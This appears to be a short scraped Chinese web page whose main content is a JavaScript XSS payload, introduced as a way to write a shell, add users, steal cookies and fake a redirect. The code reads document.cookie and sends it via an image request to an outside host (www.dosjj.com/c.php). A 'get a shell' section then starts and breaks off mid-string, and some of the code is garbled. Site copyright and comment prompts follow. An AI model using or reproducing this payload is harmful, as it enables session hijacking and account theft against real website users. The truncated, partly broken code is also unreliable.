js里可以写shell,添加用户,偷取cookie然后模拟出真正的转向
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexof(‘password’)==-1?0:1;
tolocation=’https://www.jb51.net/’;
//get cookie
x=new image();
x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);
//get a shell
data=”txacontent=
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
我要评论
发表评论